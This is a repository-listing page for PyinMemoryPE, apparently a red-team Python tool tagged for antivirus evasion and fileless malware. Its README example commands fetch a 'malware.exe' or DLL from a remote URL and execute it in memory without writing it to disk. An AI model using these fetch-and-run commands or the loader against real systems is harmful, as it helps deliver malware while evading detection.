https://github.com/elmerikh/pyinmemorype
load PE in memory Filelessly
https://github.com/elmerikh/pyinmemorype
evade-av fileless-attack fileless-malware fileless-pe-injector pe-file-injector pe-injection pe-loader python-pe-injector redteam-tools redteaming-tools
Last synced: 9 months ago
JSON representation
load PE in memory Filelessly
- Host: GitHub
- URL: https://github.com/elmerikh/pyinmemorype
- Owner: ELMERIKH
- License: apache-2.0
- Created: 2024-04-28T14:31:38.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-04-28T14:38:00.000Z (over 1 year ago)
- Last Synced: 2024-05-30T01:18:04.736Z (over 1 year ago)
- Topics: evade-av, fileless-attack, fileless-malware, fileless-pe-injector, pe-file-injector, pe-injection, pe-loader, python-pe-injector, redteam-tools, redteaming-tools
- Language: Python
- Homepage:
- Size: 11.2 MB
- Stars: 2
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
Greetings
------------
# PyinMemoryPE
execute any PE (dll,exe) in memory filelessly
# usage
pyMemory.py < url> < TYPe >
# build into exe
use pyinstaller or nuitka and build pymemory.py
or use the prebuilt exe in ./output
# example
exe : PyexecMemory.exe http://example.com/malware.exe EXE
dll: PyexecMemory.exe http://example.com/malware.dll DLL --Method DLLRegisterServer
#video demo :(by gemini cyber security)
https://youtu.be/51dctDdCiI0?feature=shared
# Check for more info and resources
https://github.com/naksyn/PythonMemoryModule
https://www.joachim-bauch.de/tutorials/loading-a-dll-from-memory/